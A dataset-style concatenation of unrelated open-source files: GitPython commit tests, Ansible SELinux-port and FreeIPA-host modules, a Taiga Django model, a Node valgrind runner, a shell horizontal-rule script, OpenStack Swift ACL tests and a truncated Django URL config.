all_commits = Commit.list_items(self.rorepo, self.rorepo.head)
assert all_commits
assert all_commits == list(self.rorepo.iter_commits())
# this includes merge commits
mcomit = self.rorepo.commit('d884adc80c80300b4cc05321494713904ef1df2d')
assert mcomit in all_commits
# we can limit the result to paths
ltd_commits = list(self.rorepo.iter_commits(paths='CHANGES'))
assert ltd_commits and len(ltd_commits) < len(all_commits)
# show commits of multiple paths, resulting in a union of commits
less_ltd_commits = list(Commit.iter_items(self.rorepo, 'master', paths=('CHANGES', 'AUTHORS')))
assert len(ltd_commits) < len(less_ltd_commits)
def test_iter_items(self):
# pretty not allowed
self.failUnlessRaises(ValueError, Commit.iter_items, self.rorepo, 'master', pretty="raw")
def test_rev_list_bisect_all(self):
"""
'git rev-list --bisect-all' returns additional information
in the commit header. This test ensures that we properly parse it.
"""
revs = self.rorepo.git.rev_list('933d23bf95a5bd1624fbcdf328d904e1fa173474',
first_parent=True,
bisect_all=True)
commits = Commit._iter_from_process_or_stream(self.rorepo, StringProcessAdapter(revs.encode('ascii')))
expected_ids = (
'7156cece3c49544abb6bf7a0c218eb36646fad6d',
'1f66cfbbce58b4b552b041707a12d437cc5f400a',
'33ebe7acec14b25c5f84f35a664803fcab2f7781',
'933d23bf95a5bd1624fbcdf328d904e1fa173474'
)
for sha1, commit in zip(expected_ids, commits):
assert_equal(sha1, commit.hexsha)
def test_count(self):
assert self.rorepo.tag('refs/tags/0.1.5').commit.count() == 143
def test_list(self):
# This doesn't work anymore, as we will either attempt getattr with bytes, or compare 20 byte string
# with actual 20 byte bytes. This usage makes no sense anyway
assert isinstance(Commit.list_items(self.rorepo, '0.1.5', max_count=5)[
'5117c9c8a4d3af19a9958677e45cda9269de1541'], Commit)
def test_str(self):
commit = Commit(self.rorepo, Commit.NULL_BIN_SHA)
assert_equal(Commit.NULL_HEX_SHA, str(commit))
def test_repr(self):
commit = Commit(self.rorepo, Commit.NULL_BIN_SHA)
assert_equal('<git.Commit "%s">' % Commit.NULL_HEX_SHA, repr(commit))
def test_equality(self):
commit1 = Commit(self.rorepo, Commit.NULL_BIN_SHA)
commit2 = Commit(self.rorepo, Commit.NULL_BIN_SHA)
commit3 = Commit(self.rorepo, "\1" * 20)
assert_equal(commit1, commit2)
assert_not_equal(commit2, commit3)
def test_iter_parents(self):
# should return all but ourselves, even if skip is defined
c = self.rorepo.commit('0.1.5')
for skip in (0, 1):
piter = c.iter_parents(skip=skip)
first_parent = next(piter)
assert first_parent != c
assert first_parent == c.parents[0]
# END for each
def test_name_rev(self):
name_rev = self.rorepo.head.commit.name_rev
assert isinstance(name_rev, string_types)
@with_rw_repo('HEAD', bare=True)
def test_serialization(self, rwrepo):
# create all commits of our repo
assert_commit_serialization(rwrepo, '0.1.6')
def test_serialization_unicode_support(self):
assert Commit.default_encoding.lower() == 'utf-8'
# create a commit with unicode in the message, and the author's name
# Verify its serialization and deserialization
cmt = self.rorepo.commit('0.1.6')
assert isinstance(cmt.message, text_type) # it automatically decodes it as such
assert isinstance(cmt.author.name, text_type) # same here
cmt.message = u"üäêèß"
assert len(cmt.message) == 5
cmt.author.name = u"äüß"
assert len(cmt.author.name) == 3
cstream = BytesIO()
cmt._serialize(cstream)
cstream.seek(0)
assert len(cstream.getvalue())
ncmt = Commit(self.rorepo, cmt.binsha)
ncmt._deserialize(cstream)
assert cmt.author.name == ncmt.author.name
assert cmt.message == ncmt.message
# actually, it can't be printed in a shell as repr wants to have ascii only
# it appears
cmt.author.__repr__()
def test_gpgsig(self):
cmt = self.rorepo.commit()
cmt._deserialize(open(fixture_path('commit_with_gpgsig'), 'rb'))
fixture_sig = """-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
iQIcBAABAgAGBQJRk8zMAAoJEG5mS6x6i9IjsTEP/0v2Wx/i7dqyKban6XMIhVdj
uI0DycfXqnCCZmejidzeao+P+cuK/ZAA/b9fU4MtwkDm2USvnIOrB00W0isxsrED
sdv6uJNa2ybGjxBolLrfQcWutxGXLZ1FGRhEvkPTLMHHvVriKoNFXcS7ewxP9MBf
NH97K2wauqA+J4BDLDHQJgADCOmLrGTAU+G1eAXHIschDqa6PZMH5nInetYZONDh
3SkOOv8VKFIF7gu8X7HC+7+Y8k8U0TW0cjlQ2icinwCc+KFoG6GwXS7u/VqIo1Yp
Tack6sxIdK7NXJhV5gAeAOMJBGhO0fHl8UUr96vGEKwtxyZhWf8cuIPOWLk06jA0
g9DpLqmy/pvyRfiPci+24YdYRBua/vta+yo/Lp85N7Hu/cpIh+q5WSLvUlv09Dmo
TTTG8Hf6s3lEej7W8z2xcNZoB6GwXd8buSDU8cu0I6mEO9sNtAuUOHp2dBvTA6cX
PuQW8jg3zofnx7CyNcd3KF3nh2z8mBcDLgh0Q84srZJCPRuxRcp9ylggvAG7iaNd
XMNvSK8IZtWLkx7k3A3QYt1cN4y1zdSHLR2S+BVCEJea1mvUE+jK5wiB9S4XNtKm
BX/otlTa8pNE3fWYBxURvfHnMY4i3HQT7Bc1QjImAhMnyo2vJk4ORBJIZ1FTNIhJ
JzJMZDRLQLFvnzqZuCjE
=przd
-----END PGP SIGNATURE-----"""
assert cmt.gpgsig == fixture_sig
cmt.gpgsig = "<test\ndummy\nsig>"
assert cmt.gpgsig != fixture_sig
cstream = BytesIO()
cmt._serialize(cstream)
assert re.search(r"^gpgsig <test\n dummy\n sig>$", cstream.getvalue().decode('ascii'), re.MULTILINE)
cstream.seek(0)
cmt.gpgsig = None
cmt._deserialize(cstream)
assert cmt.gpgsig == "<test\ndummy\nsig>"
cmt.gpgsig = None
cstream = BytesIO()
cmt._serialize(cstream)
assert not re.search(r"^gpgsig ", cstream.getvalue().decode('ascii'), re.MULTILINE)
| mit | -6,085,914,519,278,853,000 | 36.168675 | 110 | 0.647326 | false |
Jorge-Rodriguez/ansible | lib/ansible/modules/system/seport.py | 4 | 8442 | #!/usr/bin/python
# Copyright: (c) 2014, Dan Keder <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: seport
short_description: Manages SELinux network port type definitions
description:
- Manages SELinux network port type definitions.
version_added: "2.0"
options:
ports:
description:
- Ports or port ranges. Can be a list (since 2.6) or comma separated string.
required: true
proto:
description:
- Protocol for the specified port.
required: true
choices: [ tcp, udp ]
setype:
description:
- SELinux type for the specified port.
required: true
state:
description:
- Desired boolean value.
required: true
choices: [ absent, present ]
default: present
reload:
description:
- Reload SELinux policy after commit.
type: bool
default: 'yes'
ignore_selinux_state:
description:
- Run independent of selinux runtime state
type: bool
default: false
version_added: '2.8'
notes:
- The changes are persistent across reboots.
- Not tested on any debian based system.
requirements:
- libselinux-python
- policycoreutils-python
author:
- Dan Keder (@dankeder)
'''
EXAMPLES = '''
- name: Allow Apache to listen on tcp port 8888
seport:
ports: 8888
proto: tcp
setype: http_port_t
state: present
- name: Allow sshd to listen on tcp port 8991
seport:
ports: 8991
proto: tcp
setype: ssh_port_t
state: present
- name: Allow memcached to listen on tcp ports 10000-10100 and 10112
seport:
ports: 10000-10100,10112
proto: tcp
setype: memcache_port_t
state: present
- name: Allow memcached to listen on tcp ports 10000-10100 and 10112
seport:
ports:
- 10000-10100
- 10112
proto: tcp
setype: memcache_port_t
state: present
'''
import traceback
SELINUX_IMP_ERR = None
try:
import selinux
HAVE_SELINUX = True
except ImportError:
SELINUX_IMP_ERR = traceback.format_exc()
HAVE_SELINUX = False
SEOBJECT_IMP_ERR = None
try:
import seobject
HAVE_SEOBJECT = True
except ImportError:
SEOBJECT_IMP_ERR = traceback.format_exc()
HAVE_SEOBJECT = False
from ansible.module_utils.basic import AnsibleModule, missing_required_lib
from ansible.module_utils._text import to_native
def get_runtime_status(ignore_selinux_state=False):
return True if ignore_selinux_state is True else selinux.is_selinux_enabled()
def semanage_port_get_ports(seport, setype, proto):
""" Get the list of ports that have the specified type definition.
:param seport: Instance of seobject.portRecords
:type setype: str
:param setype: SELinux type.
:type proto: str
:param proto: Protocol ('tcp' or 'udp')
:rtype: list
:return: List of ports that have the specified SELinux type.
"""
records = seport.get_all_by_type()
if (setype, proto) in records:
return records[(setype, proto)]
else:
return []
def semanage_port_get_type(seport, port, proto):
""" Get the SELinux type of the specified port.
:param seport: Instance of seobject.portRecords
:type port: str
:param port: Port or port range (example: "8080", "8080-9090")
:type proto: str
:param proto: Protocol ('tcp' or 'udp')
:rtype: tuple
:return: Tuple containing the SELinux type and MLS/MCS level, or None if not found.
"""
ports = port.split('-', 1)
if len(ports) == 1:
ports.extend(ports)
key = (int(ports[0]), int(ports[1]), proto)
records = seport.get_all()
if key in records:
return records[key]
else:
return None
def semanage_port_add(module, ports, proto, setype, do_reload, serange='s0', sestore=''):
""" Add SELinux port type definition to the policy.
:type module: AnsibleModule
:param module: Ansible module
:type ports: list
:param ports: List of ports and port ranges to add (e.g. ["8080", "8080-9090"])
:type proto: str
:param proto: Protocol ('tcp' or 'udp')
:type setype: str
:param setype: SELinux type
:type do_reload: bool
:param do_reload: Whether to reload SELinux policy after commit
:type serange: str
:param serange: SELinux MLS/MCS range (defaults to 's0')
:type sestore: str
:param sestore: SELinux store
:rtype: bool
:return: True if the policy was changed, otherwise False
"""
try:
seport = seobject.portRecords(sestore)
seport.set_reload(do_reload)
change = False
ports_by_type = semanage_port_get_ports(seport, setype, proto)
for port in ports:
if port not in ports_by_type:
change = True
port_type = semanage_port_get_type(seport, port, proto)
if port_type is None and not module.check_mode:
seport.add(port, proto, serange, setype)
elif port_type is not None and not module.check_mode:
seport.modify(port, proto, serange, setype)
except (ValueError, IOError, KeyError, OSError, RuntimeError) as e:
module.fail_json(msg="%s: %s\n" % (e.__class__.__name__, to_native(e)), exception=traceback.format_exc())
return change
def semanage_port_del(module, ports, proto, setype, do_reload, sestore=''):
""" Delete SELinux port type definition from the policy.
:type module: AnsibleModule
:param module: Ansible module
:type ports: list
:param ports: List of ports and port ranges to delete (e.g. ["8080", "8080-9090"])
:type proto: str
:param proto: Protocol ('tcp' or 'udp')
:type setype: str
:param setype: SELinux type.
:type do_reload: bool
:param do_reload: Whether to reload SELinux policy after commit
:type sestore: str
:param sestore: SELinux store
:rtype: bool
:return: True if the policy was changed, otherwise False
"""
try:
seport = seobject.portRecords(sestore)
seport.set_reload(do_reload)
change = False
ports_by_type = semanage_port_get_ports(seport, setype, proto)
for port in ports:
if port in ports_by_type:
change = True
if not module.check_mode:
seport.delete(port, proto)
except (ValueError, IOError, KeyError, OSError, RuntimeError) as e:
module.fail_json(msg="%s: %s\n" % (e.__class__.__name__, to_native(e)), exception=traceback.format_exc())
return change
def main():
module = AnsibleModule(
argument_spec=dict(
ignore_selinux_state=dict(type='bool', default=False),
ports=dict(type='list', required=True),
proto=dict(type='str', required=True, choices=['tcp', 'udp']),
setype=dict(type='str', required=True),
state=dict(type='str', required=True, choices=['absent', 'present']),
reload=dict(type='bool', default=True),
),
supports_check_mode=True,
)
if not HAVE_SELINUX:
module.fail_json(msg=missing_required_lib("libselinux-python"), exception=SELINUX_IMP_ERR)
if not HAVE_SEOBJECT:
module.fail_json(msg=missing_required_lib("policycoreutils-python"), exception=SEOBJECT_IMP_ERR)
ignore_selinux_state = module.params['ignore_selinux_state']
if not get_runtime_status(ignore_selinux_state):
module.fail_json(msg="SELinux is disabled on this host.")
ports = module.params['ports']
proto = module.params['proto']
setype = module.params['setype']
state = module.params['state']
do_reload = module.params['reload']
result = {
'ports': ports,
'proto': proto,
'setype': setype,
'state': state,
}
if state == 'present':
result['changed'] = semanage_port_add(module, ports, proto, setype, do_reload)
elif state == 'absent':
result['changed'] = semanage_port_del(module, ports, proto, setype, do_reload)
else:
module.fail_json(msg='Invalid value of argument "state": {0}'.format(state))
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 | -3,285,057,386,472,222,000 | 26.953642 | 113 | 0.637645 | false |
Zaneh-/bearded-tribble-back | taiga/feedback/models.py | 21 | 1633 | # Copyright (C) 2014 Andrey Antukh <[email protected]>
# Copyright (C) 2014 Jesús Espino <[email protected]>
# Copyright (C) 2014 David Barragán <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.db import models
from django.utils.translation import ugettext_lazy as _
class FeedbackEntry(models.Model):
full_name = models.CharField(null=False, blank=False, max_length=256,
verbose_name=_('full name'))
email = models.EmailField(null=False, blank=False, max_length=255,
verbose_name=_('email address'))
comment = models.TextField(null=False, blank=False,
verbose_name=_("comment"))
created_date = models.DateTimeField(null=False, blank=False, auto_now_add=True,
verbose_name=_("created date"))
class Meta:
verbose_name = "feedback entry"
verbose_name_plural = "feedback entries"
ordering = ["-created_date", "id"]
| agpl-3.0 | -8,765,439,346,029,666,000 | 46.970588 | 83 | 0.676272 | false |
lexor90/node-compiler | node/tools/run-valgrind.py | 5 | 2519 | #!/usr/bin/env python
#
# Copyright 2009 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from os import path
import subprocess
import sys
NODE_ROOT = path.dirname(path.dirname(path.abspath(__file__)))
VALGRIND_ARGUMENTS = [
'valgrind',
'--error-exitcode=1',
'--smc-check=all',
# Node.js does not clean up on exit so don't complain about
# memory leaks but do complain about invalid memory access.
'--quiet',
]
if len(sys.argv) < 2:
print 'Please provide an executable to analyze.'
sys.exit(1)
executable = path.join(NODE_ROOT, sys.argv[1])
if not path.exists(executable):
print 'Cannot find the file specified: %s' % executable
sys.exit(1)
# Compute the command line.
command = VALGRIND_ARGUMENTS + [executable] + sys.argv[2:]
# Run valgrind.
process = subprocess.Popen(command, stderr=subprocess.PIPE)
code = process.wait()
errors = process.stderr.readlines()
# If valgrind produced an error, we report that to the user.
if code != 0:
sys.stderr.writelines(errors)
sys.exit(code)
| mit | -1,382,701,634,226,333,400 | 37.753846 | 72 | 0.745931 | false |
DepthDeluxe/ansible | lib/ansible/modules/identity/ipa/ipa_host.py | 22 | 10210 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ipa_host
author: Thomas Krahn (@Nosmoht)
short_description: Manage FreeIPA host
description:
- Add, modify and delete an IPA host using IPA API
options:
fqdn:
description:
- Full qualified domain name.
- Can not be changed as it is the unique identifier.
required: true
aliases: ["name"]
description:
description:
- A description of this host.
required: false
force:
description:
- Force host name even if not in DNS.
required: false
ip_address:
description:
- Add the host to DNS with this IP address.
required: false
mac_address:
description:
- List of Hardware MAC address(es) off this host.
- If option is omitted MAC addresses will not be checked or changed.
- If an empty list is passed all assigned MAC addresses will be removed.
- MAC addresses that are already assigned but not passed will be removed.
required: false
aliases: ["macaddress"]
ns_host_location:
description:
- Host location (e.g. "Lab 2")
required: false
aliases: ["nshostlocation"]
ns_hardware_platform:
description:
- Host hardware platform (e.g. "Lenovo T61")
required: false
aliases: ["nshardwareplatform"]
ns_os_version:
description:
- Host operating system and version (e.g. "Fedora 9")
required: false
aliases: ["nsosversion"]
user_certificate:
description:
- List of Base-64 encoded server certificates.
- If option is omitted certificates will not be checked or changed.
- If an empty list is passed all assigned certificates will be removed.
- Certificates already assigned but not passed will be removed.
required: false
aliases: ["usercertificate"]
state:
description: State to ensure
required: false
default: present
choices: ["present", "absent", "disabled"]
ipa_port:
description: Port of IPA server
required: false
default: 443
ipa_host:
description: IP or hostname of IPA server
required: false
default: ipa.example.com
ipa_user:
description: Administrative account used on IPA server
required: false
default: admin
ipa_pass:
description: Password of administrative user
required: true
ipa_prot:
description: Protocol used by IPA server
required: false
default: https
choices: ["http", "https"]
validate_certs:
description:
- This only applies if C(ipa_prot) is I(https).
- If set to C(no), the SSL certificates will not be validated.
- This should only set to C(no) used on personally controlled sites using self-signed certificates.
required: false
default: true
version_added: "2.3"
'''
EXAMPLES = '''
# Ensure host is present
- ipa_host:
name: host01.example.com
description: Example host
ip_address: 192.168.0.123
ns_host_location: Lab
ns_os_version: CentOS 7
ns_hardware_platform: Lenovo T61
mac_address:
- "08:00:27:E3:B1:2D"
- "52:54:00:BD:97:1E"
state: present
ipa_host: ipa.example.com
ipa_user: admin
ipa_pass: topsecret
# Ensure host is disabled
- ipa_host:
name: host01.example.com
state: disabled
ipa_host: ipa.example.com
ipa_user: admin
ipa_pass: topsecret
# Ensure that all user certificates are removed
- ipa_host:
name: host01.example.com
user_certificate: []
ipa_host: ipa.example.com
ipa_user: admin
ipa_pass: topsecret
# Ensure host is absent
- ipa_host:
name: host01.example.com
state: absent
ipa_host: ipa.example.com
ipa_user: admin
ipa_pass: topsecret
'''
RETURN = '''
host:
description: Host as returned by IPA API.
returned: always
type: dict
host_diff:
description: List of options that differ and would be changed
returned: if check mode and a difference is found
type: list
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.pycompat24 import get_exception
from ansible.module_utils.ipa import IPAClient
class HostIPAClient(IPAClient):
def __init__(self, module, host, port, protocol):
super(HostIPAClient, self).__init__(module, host, port, protocol)
def host_find(self, name):
return self._post_json(method='host_find', name=None, item={'all': True, 'fqdn': name})
def host_add(self, name, host):
return self._post_json(method='host_add', name=name, item=host)
def host_mod(self, name, host):
return self._post_json(method='host_mod', name=name, item=host)
def host_del(self, name):
return self._post_json(method='host_del', name=name)
def host_disable(self, name):
return self._post_json(method='host_disable', name=name)
def get_host_dict(description=None, force=None, ip_address=None, ns_host_location=None, ns_hardware_platform=None,
ns_os_version=None, user_certificate=None, mac_address=None):
data = {}
if description is not None:
data['description'] = description
if force is not None:
data['force'] = force
if ip_address is not None:
data['ip_address'] = ip_address
if ns_host_location is not None:
data['nshostlocation'] = ns_host_location
if ns_hardware_platform is not None:
data['nshardwareplatform'] = ns_hardware_platform
if ns_os_version is not None:
data['nsosversion'] = ns_os_version
if user_certificate is not None:
data['usercertificate'] = [{"__base64__": item} for item in user_certificate]
if mac_address is not None:
data['macaddress'] = mac_address
return data
def get_host_diff(client, ipa_host, module_host):
non_updateable_keys = ['force', 'ip_address']
for key in non_updateable_keys:
if key in module_host:
del module_host[key]
return client.get_diff(ipa_data=ipa_host, module_data=module_host)
def ensure(module, client):
name = module.params['name']
state = module.params['state']
ipa_host = client.host_find(name=name)
module_host = get_host_dict(description=module.params['description'],
force=module.params['force'], ip_address=module.params['ip_address'],
ns_host_location=module.params['ns_host_location'],
ns_hardware_platform=module.params['ns_hardware_platform'],
ns_os_version=module.params['ns_os_version'],
user_certificate=module.params['user_certificate'],
mac_address=module.params['mac_address'])
changed = False
if state in ['present', 'enabled', 'disabled']:
if not ipa_host:
changed = True
if not module.check_mode:
client.host_add(name=name, host=module_host)
else:
diff = get_host_diff(client, ipa_host, module_host)
if len(diff) > 0:
changed = True
if not module.check_mode:
data = {}
for key in diff:
data[key] = module_host.get(key)
client.host_mod(name=name, host=data)
else:
if ipa_host:
changed = True
if not module.check_mode:
client.host_del(name=name)
return changed, client.host_find(name=name)
def main():
module = AnsibleModule(
argument_spec=dict(
description=dict(type='str', required=False),
fqdn=dict(type='str', required=True, aliases=['name']),
force=dict(type='bool', required=False),
ip_address=dict(type='str', required=False),
ns_host_location=dict(type='str', required=False, aliases=['nshostlocation']),
ns_hardware_platform=dict(type='str', required=False, aliases=['nshardwareplatform']),
ns_os_version=dict(type='str', required=False, aliases=['nsosversion']),
user_certificate=dict(type='list', required=False, aliases=['usercertificate']),
mac_address=dict(type='list', required=False, aliases=['macaddress']),
state=dict(type='str', required=False, default='present',
choices=['present', 'absent', 'enabled', 'disabled']),
ipa_prot=dict(type='str', required=False, default='https', choices=['http', 'https']),
ipa_host=dict(type='str', required=False, default='ipa.example.com'),
ipa_port=dict(type='int', required=False, default=443),
ipa_user=dict(type='str', required=False, default='admin'),
ipa_pass=dict(type='str', required=True, no_log=True),
validate_certs=dict(type='bool', required=False, default=True),
),
supports_check_mode=True,
)
client = HostIPAClient(module=module,
host=module.params['ipa_host'],
port=module.params['ipa_port'],
protocol=module.params['ipa_prot'])
try:
client.login(username=module.params['ipa_user'],
password=module.params['ipa_pass'])
changed, host = ensure(module, client)
module.exit_json(changed=changed, host=host)
except Exception:
e = get_exception()
module.fail_json(msg=str(e))
if __name__ == '__main__':
main()
| gpl-3.0 | 2,483,066,706,811,936,000 | 32.920266 | 114 | 0.632321 | false |
hammerhorn/working | hr.py | 1 | 2015 | #!/usr/bin/env python3
"""
Produces horizontal lines for use in shell scripts.
usage: hr.py [-h] [-w WIDTH] [-p PATTERN] [-c]
optional arguments:
-h, --help show this help message and exit
-w WIDTH, --width WIDTH
-p PATTERN, --pattern PATTERN
-c, --center
* floats should give screenwidths, ints shoudl give charwidths
"""
import argparse
from versatiledialogs.terminal import Terminal
__author__ = 'Chris Horn <[email protected]>'
__license__ = 'GPL'
Terminal()
def _parse_args():
"""
Parse all args and return 'args' namespace.
"""
parser = argparse.ArgumentParser(
description='Produces horizontal lines for use in shell scripts.')
parser.add_argument(
'-w', '--width', type=float, help='width in columns or width in ' +
'screenwidths')
parser.add_argument(
'-p', '--pattern', type=str, help='symbol or sequence of symbols')
parser.add_argument(
'-c', '--center',
action='store_true',
help='centered (default is left-aligned)')
return parser.parse_args()
ARGS = _parse_args() if __name__ == '__main__' else None
# If ARGS.width is an int, it means: width in columns. #
# If it's < 1, it means: a percent of the width of the terminal. #
if ARGS is not None and ARGS.width is not None and (ARGS.width == int(ARGS.width)):
ARGS.width = int(ARGS.width)
# possible to this automatically?
def populate_args():
"""
Convert args namespace to a dictionary, for use in the Cli.hrule()
method.
"""
kw_dict = {}
if ARGS is not None:
if ARGS.width is not None:
kw_dict.update({'width': ARGS.width})
if ARGS.pattern is not None:
kw_dict.update({'symbols': ARGS.pattern})
if ARGS.center is True:
kw_dict.update({'centered': ARGS.center})
return kw_dict
# print arg_dic
ARG_DICT = populate_args()
if __name__ == '__main__':
Terminal.hrule(**ARG_DICT)
Terminal.output('')
| gpl-3.0 | 1,426,352,709,110,236,700 | 27.785714 | 83 | 0.6134 | false |
neerja28/Tempest | tempest/api/object_storage/test_container_acl.py | 4 | 3994 | # Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest_lib.common.utils import data_utils
from tempest.api.object_storage import base
from tempest import config
from tempest import test
CONF = config.CONF
class ObjectTestACLs(base.BaseObjectTest):
credentials = [['operator', CONF.object_storage.operator_role],
['operator_alt', CONF.object_storage.operator_role]]
@classmethod
def setup_credentials(cls):
super(ObjectTestACLs, cls).setup_credentials()
cls.os = cls.os_roles_operator
cls.os_operator = cls.os_roles_operator_alt
@classmethod
def resource_setup(cls):
super(ObjectTestACLs, cls).resource_setup()
cls.test_auth_data = cls.os_operator.auth_provider.auth_data
def setUp(self):
super(ObjectTestACLs, self).setUp()
self.container_name = data_utils.rand_name(name='TestContainer')
self.container_client.create_container(self.container_name)
def tearDown(self):
self.delete_containers([self.container_name])
super(ObjectTestACLs, self).tearDown()
@test.idempotent_id('a3270f3f-7640-4944-8448-c7ea783ea5b6')
def test_read_object_with_rights(self):
# attempt to read object using authorized user
# update X-Container-Read metadata ACL
tenant_name = self.os_operator.credentials.tenant_name
username = self.os_operator.credentials.username
cont_headers = {'X-Container-Read': tenant_name + ':' + username}
resp_meta, body = self.container_client.update_container_metadata(
self.container_name, metadata=cont_headers,
metadata_prefix='')
self.assertHeaders(resp_meta, 'Container', 'POST')
# create object
object_name = data_utils.rand_name(name='Object')
resp, _ = self.object_client.create_object(self.container_name,
object_name, 'data')
self.assertHeaders(resp, 'Object', 'PUT')
# Trying to read the object with rights
self.object_client.auth_provider.set_alt_auth_data(
request_part='headers',
auth_data=self.test_auth_data
)
resp, _ = self.object_client.get_object(
self.container_name, object_name)
self.assertHeaders(resp, 'Object', 'GET')
@test.idempotent_id('aa58bfa5-40d9-4bc3-82b4-d07f4a9e392a')
def test_write_object_with_rights(self):
# attempt to write object using authorized user
# update X-Container-Write metadata ACL
tenant_name = self.os_operator.credentials.tenant_name
username = self.os_operator.credentials.username
cont_headers = {'X-Container-Write': tenant_name + ':' + username}
resp_meta, body = self.container_client.update_container_metadata(
self.container_name, metadata=cont_headers,
metadata_prefix='')
self.assertHeaders(resp_meta, 'Container', 'POST')
# Trying to write the object with rights
self.object_client.auth_provider.set_alt_auth_data(
request_part='headers',
auth_data=self.test_auth_data
)
object_name = data_utils.rand_name(name='Object')
resp, _ = self.object_client.create_object(
self.container_name,
object_name, 'data', headers={})
self.assertHeaders(resp, 'Object', 'PUT')
| apache-2.0 | 2,373,737,822,112,379,400 | 41.042105 | 78 | 0.658237 | false |
bicofino/Pyramboia | pyramboia/pyramboia/urls.py | 1 | 5379 | from django.conf.urls import patterns, include, url
from django.contrib import admin
from tasks.views import runTask
from tasks.views import ProjectListView, ProjectCreateView, ProjectDetailView, ProjectUpdateView, ProjectDeleteView, HeaderListView, HeaderCreateView, HeaderDetailView, HeaderUpdateView, HeaderDeleteView, TargetListView, TargetCreateView, TargetDetailView, TargetUpdateView, TargetDeleteView, ArgumentListView, ArgumentCreateView, ArgumentDetailView, ArgumentUpdateView, ArgumentDeleteView, TaskListView, TaskCreateView, TaskDetailView, TaskUpdateView, TaskDeleteView
#from tasks.api import TasksResource
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'Pyramboia.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^admin/', include(admin.site.urls)),
url(r'^$', 'tasks.views.home', name='home'),
# Project URLS
url(r'^projects$',
ProjectListView.as_view(),
name='project-list'),
url(r'^project/add/$',
ProjectCreateView.as_view(),
name='project-create'),
url(r'^project/(?P<pk>[\w\d]+)/$',
ProjectDetailView.as_view(),
name='project-detail'),
url(r'^project/(?P<pk>[\w\d]+)/edit/$',
ProjectUpdateView.as_view(),
name='project-update'),
url(r'^project/(?P<pk>[\w\d]+)/delete/$',
ProjectDeleteView.as_view(),
name='project-delete'),
# Header URLS
url(r'^headers$',
HeaderListView.as_view(),
name='header-list'),
url(r'^header/add/$',
HeaderCreateView.as_view(),
name='header-create'),
url(r'^header/(?P<pk>[\w\d]+)/$',
HeaderDetailView.as_view(),
name='header-detail'),
url(r'^header/(?P<pk>[\w\d]+)/edit/$',
HeaderUpdateView.as_view(),
name='header-update'),
url(r'^header/(?P<pk>[\w\d]+)/delete/$',
HeaderDeleteView.as_view(),
name='header-delete'),
# Target URLS
url(r'^targets$',
TargetListView.as_view(),
name='target-list'),
url(r'^target/add/$',
TargetCreateView.as_view(),
name='target-create'),
url(r'^target/(?P<pk>[\w\d]+)/$',
TargetDetailView.as_view(),
name='target-detail'),
url(r'^target/(?P<pk>[\w\d]+)/edit/$',
TargetUpdateView.as_view(),
name='target-update'),
url(r'^target/(?P<pk>[\w\d]+)/delete/$',
TargetDeleteView.as_view(),
name='target-delete'),
# Argument URLS
url(r'^arguments$',
ArgumentListView.as_view(),
name='argument-list'),
url(r'^argument/add/$',
ArgumentCreateView.as_view(),
